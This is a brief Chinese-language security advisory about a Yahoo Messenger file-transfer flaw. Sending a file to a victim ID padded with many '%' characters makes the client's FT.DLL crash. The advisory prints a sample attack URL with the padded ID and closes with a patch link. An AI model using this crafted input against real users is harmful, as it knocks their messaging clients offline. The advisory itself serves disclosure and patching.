受影响程序：Yahoo messenger

　　详细 描述：

　　Yahoo messenger中的文件传输选项漏洞能让远程攻击者关闭受害人的yahoo messenger客户端。

　　Yahoo messenger能过滤掉yahooID中的一些特别字符（象&,?），当攻击者发送一个文件到 “受害人的ID%%%%%%%%%（超过73个字符）”时，服务器端过滤掉%字符署名“受害者ID”并打开一个文件传输会话，如果受害人接受了这个文件，他的客户端就会提示存取出错并关闭，出错的原因是负责yahoo messenger P2P文件传输中的一个FT.DLL文件造成的。

　　攻击者发送给受害者机器的样本地址：

　　http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2vykgw5e5j9dao0o9 doeawsg31h9t8vey6uq19
6y 14 53
Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT   
　　补丁下载：http://cn.messenger.yahoo.com/